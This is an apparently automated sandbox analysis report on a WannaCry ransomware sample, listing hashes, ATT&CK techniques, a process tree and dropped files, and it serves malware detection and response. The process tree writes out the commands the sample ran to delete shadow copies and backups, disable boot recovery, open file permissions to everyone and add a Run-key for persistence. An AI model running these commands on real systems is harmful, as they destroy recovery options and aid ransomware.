wannacry | 761e037ee186880d5f7d1f112b839818056f160a9ba60c7fb8d23d926ac0621f

General

Target

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Size

3.4MB
MD5

84c82835a5d21bbcf75a61706d8ab549
SHA1

5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512

90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
SSDEEP

98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB

Score

10^/10

wannacry discovery persistence ransomware spyware stealer worm

Malware Config

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Drops startup file 1 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD1C91.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 17 IoCs

Processes:

taskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exetaskdl.exe@[email protected]@[email protected]taskse.exe@[email protected]taskdl.exe

pid	process
2476	taskdl.exe
280	@[email protected]
2124	@[email protected]
1288	taskhsvc.exe
2604	taskdl.exe
2576	taskse.exe
1096	@[email protected]
1676	taskdl.exe
2380	taskse.exe
2720	@[email protected]
2056	taskse.exe
2920	taskdl.exe
2716	@[email protected]
756	@[email protected]
1092	taskse.exe
1044	@[email protected]
676	taskdl.exe

Loads dropped DLL 39 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.execscript.execmd.exe@[email protected]taskhsvc.exe

pid	process
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
1832	cscript.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
1088	cmd.exe
1088	cmd.exe
280	@[email protected]
280	@[email protected]
1288	taskhsvc.exe
1288	taskhsvc.exe
1288	taskhsvc.exe
1288	taskhsvc.exe
1288	taskhsvc.exe
1288	taskhsvc.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

2508 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2508	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\qbzrmcmamrxndxa282 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\""	reg.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2928 vssadmin.exe
Modifies registry class 1 IoCs

Processes:

rundll32.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings rundll32.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2528 reg.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

taskhsvc.exe

pid process

1288 taskhsvc.exe
1288 taskhsvc.exe
1288 taskhsvc.exe

pid	process
2928	vssadmin.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings	rundll32.exe

pid	process
2528	reg.exe

pid	process
1288	taskhsvc.exe
1288	taskhsvc.exe
1288	taskhsvc.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

vssvc.exeWMIC.exetaskse.exetaskse.exetaskse.exetaskse.exe

description	pid	process
Token: SeBackupPrivilege	1716	vssvc.exe
Token: SeRestorePrivilege	1716	vssvc.exe
Token: SeAuditPrivilege	1716	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3028	WMIC.exe
Token: SeSecurityPrivilege	3028	WMIC.exe
Token: SeTakeOwnershipPrivilege	3028	WMIC.exe
Token: SeLoadDriverPrivilege	3028	WMIC.exe
Token: SeSystemProfilePrivilege	3028	WMIC.exe
Token: SeSystemtimePrivilege	3028	WMIC.exe
Token: SeProfSingleProcessPrivilege	3028	WMIC.exe
Token: SeIncBasePriorityPrivilege	3028	WMIC.exe
Token: SeCreatePagefilePrivilege	3028	WMIC.exe
Token: SeBackupPrivilege	3028	WMIC.exe
Token: SeRestorePrivilege	3028	WMIC.exe
Token: SeShutdownPrivilege	3028	WMIC.exe
Token: SeDebugPrivilege	3028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3028	WMIC.exe
Token: SeRemoteShutdownPrivilege	3028	WMIC.exe
Token: SeUndockPrivilege	3028	WMIC.exe
Token: SeManageVolumePrivilege	3028	WMIC.exe
Token: 33	3028	WMIC.exe
Token: 34	3028	WMIC.exe
Token: 35	3028	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3028	WMIC.exe
Token: SeSecurityPrivilege	3028	WMIC.exe
Token: SeTakeOwnershipPrivilege	3028	WMIC.exe
Token: SeLoadDriverPrivilege	3028	WMIC.exe
Token: SeSystemProfilePrivilege	3028	WMIC.exe
Token: SeSystemtimePrivilege	3028	WMIC.exe
Token: SeProfSingleProcessPrivilege	3028	WMIC.exe
Token: SeIncBasePriorityPrivilege	3028	WMIC.exe
Token: SeCreatePagefilePrivilege	3028	WMIC.exe
Token: SeBackupPrivilege	3028	WMIC.exe
Token: SeRestorePrivilege	3028	WMIC.exe
Token: SeShutdownPrivilege	3028	WMIC.exe
Token: SeDebugPrivilege	3028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3028	WMIC.exe
Token: SeRemoteShutdownPrivilege	3028	WMIC.exe
Token: SeUndockPrivilege	3028	WMIC.exe
Token: SeManageVolumePrivilege	3028	WMIC.exe
Token: 33	3028	WMIC.exe
Token: 34	3028	WMIC.exe
Token: 35	3028	WMIC.exe
Token: SeTcbPrivilege	2576	taskse.exe
Token: SeTcbPrivilege	2576	taskse.exe
Token: SeTcbPrivilege	2380	taskse.exe
Token: SeTcbPrivilege	2380	taskse.exe
Token: SeTcbPrivilege	2056	taskse.exe
Token: SeTcbPrivilege	2056	taskse.exe
Token: SeTcbPrivilege	1092	taskse.exe
Token: SeTcbPrivilege	1092	taskse.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]

pid	process
280	@[email protected]
280	@[email protected]
2124	@[email protected]
2124	@[email protected]
1096	@[email protected]
1096	@[email protected]
2720	@[email protected]
2716	@[email protected]
756	@[email protected]
1044	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.execmd.execmd.exe@[email protected]@[email protected]cmd.exe

description	pid	process	target process
PID 2320 wrote to memory of 2512	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 2320 wrote to memory of 2512	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 2320 wrote to memory of 2512	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 2320 wrote to memory of 2512	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 2320 wrote to memory of 2508	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 2320 wrote to memory of 2508	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 2320 wrote to memory of 2508	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 2320 wrote to memory of 2508	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 2320 wrote to memory of 2476	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 2320 wrote to memory of 2476	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 2320 wrote to memory of 2476	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 2320 wrote to memory of 2476	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 2320 wrote to memory of 2848	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 2320 wrote to memory of 2848	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 2320 wrote to memory of 2848	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 2320 wrote to memory of 2848	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 2848 wrote to memory of 1832	2848	cmd.exe	cscript.exe
PID 2848 wrote to memory of 1832	2848	cmd.exe	cscript.exe
PID 2848 wrote to memory of 1832	2848	cmd.exe	cscript.exe
PID 2848 wrote to memory of 1832	2848	cmd.exe	cscript.exe
PID 2320 wrote to memory of 2372	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 2320 wrote to memory of 2372	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 2320 wrote to memory of 2372	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 2320 wrote to memory of 2372	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 2320 wrote to memory of 280	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 2320 wrote to memory of 280	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 2320 wrote to memory of 280	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 2320 wrote to memory of 280	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 2320 wrote to memory of 1088	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 2320 wrote to memory of 1088	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 2320 wrote to memory of 1088	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 2320 wrote to memory of 1088	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 1088 wrote to memory of 2124	1088	cmd.exe	@[email protected]
PID 1088 wrote to memory of 2124	1088	cmd.exe	@[email protected]
PID 1088 wrote to memory of 2124	1088	cmd.exe	@[email protected]
PID 1088 wrote to memory of 2124	1088	cmd.exe	@[email protected]
PID 280 wrote to memory of 1288	280	@[email protected]	taskhsvc.exe
PID 280 wrote to memory of 1288	280	@[email protected]	taskhsvc.exe
PID 280 wrote to memory of 1288	280	@[email protected]	taskhsvc.exe
PID 280 wrote to memory of 1288	280	@[email protected]	taskhsvc.exe
PID 2124 wrote to memory of 1552	2124	@[email protected]	cmd.exe
PID 2124 wrote to memory of 1552	2124	@[email protected]	cmd.exe
PID 2124 wrote to memory of 1552	2124	@[email protected]	cmd.exe
PID 2124 wrote to memory of 1552	2124	@[email protected]	cmd.exe
PID 1552 wrote to memory of 2928	1552	cmd.exe	vssadmin.exe
PID 1552 wrote to memory of 2928	1552	cmd.exe	vssadmin.exe
PID 1552 wrote to memory of 2928	1552	cmd.exe	vssadmin.exe
PID 1552 wrote to memory of 2928	1552	cmd.exe	vssadmin.exe
PID 1552 wrote to memory of 3028	1552	cmd.exe	WMIC.exe
PID 1552 wrote to memory of 3028	1552	cmd.exe	WMIC.exe
PID 1552 wrote to memory of 3028	1552	cmd.exe	WMIC.exe
PID 1552 wrote to memory of 3028	1552	cmd.exe	WMIC.exe
PID 2320 wrote to memory of 2604	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 2320 wrote to memory of 2604	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 2320 wrote to memory of 2604	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 2320 wrote to memory of 2604	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 2320 wrote to memory of 2576	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 2320 wrote to memory of 2576	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 2320 wrote to memory of 2576	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 2320 wrote to memory of 2576	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 2320 wrote to memory of 1096	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 2320 wrote to memory of 1096	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 2320 wrote to memory of 1096	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 2320 wrote to memory of 1096	2320	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

2512 attrib.exe
2372 attrib.exe

pid	process
2512	attrib.exe
2372	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Loads dropped DLL
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:2320

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2476

C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
2⤵
- Views/modifies file attributes
PID:2372

C:\Windows\SysWOW64\cmd.exe
cmd /c 314291703379789.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:2848

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:2508

C:\Windows\SysWOW64\attrib.exe
attrib +h .
2⤵
- Views/modifies file attributes
PID:2512

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1088

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected] co
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:280

C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1288

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2604

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qbzrmcmamrxndxa282" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
2⤵
PID:2584

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
PID:1096

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2576

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1676

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2720

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2380

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2716

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2056

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2920

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1044

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:676

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
1⤵
- Loads dropped DLL
PID:1832

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected] vs
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2124

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
2⤵
- Suspicious use of WriteProcessMemory
PID:1552

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
1⤵
- Interacts with shadow copies
PID:2928

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qbzrmcmamrxndxa282" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
1⤵
- Adds Run key to start application
- Modifies registry key
PID:2528

C:\Users\Admin\Desktop\@[email protected]
"C:\Users\Admin\Desktop\@[email protected]"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:756

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Documents\DismountSelect.pot.WNCRY
1⤵
- Modifies registry class
PID:1028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

File and Directory Permissions Modification

1

T1222

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Indicator Removal

2

T1070

File Deletion

Modify Registry

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\b.wnry

Filesize
371KB

MD5
e048cd5b00a5a258ceb9f58dea15a4c7

SHA1
23588fce168659085f818da9e2966822d57f8569

SHA256
8cd0ea1c2b9bbf0733d9ec7caeac73323648b309ece606a15d7a68bb7064a58e

SHA512
1b5196e6c77bd7b9b913f97f462cfd5a4b8da7ed33c4fac925833fd6d4540cc640008eec3a2cc460a2863067dbb1ba5b713620b78c012928a1a92c3c86a8e5b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.wnry

Filesize
780B

MD5
8124a611153cd3aceb85a7ac58eaa25d

SHA1
c1d5cd8774261d810dca9b6a8e478d01cd4995d6

SHA256
0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

SHA512
b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_czech.wnry

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1288-1018-0x0000000073BB0000-0x0000000073C32000-memory.dmp

Filesize
520KB

Download
memory/1288-1013-0x0000000001020000-0x000000000131E000-memory.dmp

Filesize
3.0MB

Download
memory/1288-994-0x0000000073C40000-0x0000000073E5C000-memory.dmp

Filesize
2.1MB

Download
memory/1288-999-0x0000000001020000-0x000000000131E000-memory.dmp

Filesize
3.0MB

Download
memory/1288-1000-0x0000000001020000-0x000000000131E000-memory.dmp

Filesize
3.0MB

Download
memory/1288-998-0x0000000073B80000-0x0000000073BA2000-memory.dmp

Filesize
136KB

Download
memory/1288-996-0x0000000073BB0000-0x0000000073C32000-memory.dmp

Filesize
520KB

Download
memory/1288-1019-0x0000000073B80000-0x0000000073BA2000-memory.dmp

Filesize
136KB

Download
memory/1288-1107-0x0000000001020000-0x000000000131E000-memory.dmp

Filesize
3.0MB

Download
memory/1288-1017-0x0000000073C40000-0x0000000073E5C000-memory.dmp

Filesize
2.1MB

Download
memory/1288-1016-0x0000000073E60000-0x0000000073ED7000-memory.dmp

Filesize
476KB

Download
memory/1288-1015-0x0000000073EE0000-0x0000000073EFC000-memory.dmp

Filesize
112KB

Download
memory/1288-1014-0x0000000073F00000-0x0000000073F82000-memory.dmp

Filesize
520KB

Download
memory/1288-992-0x0000000073F00000-0x0000000073F82000-memory.dmp

Filesize
520KB

Download
memory/1288-1021-0x0000000001020000-0x000000000131E000-memory.dmp

Filesize
3.0MB

Download
memory/1288-1025-0x0000000073C40000-0x0000000073E5C000-memory.dmp

Filesize
2.1MB

Download
memory/1288-1029-0x0000000001020000-0x000000000131E000-memory.dmp

Filesize
3.0MB

Download
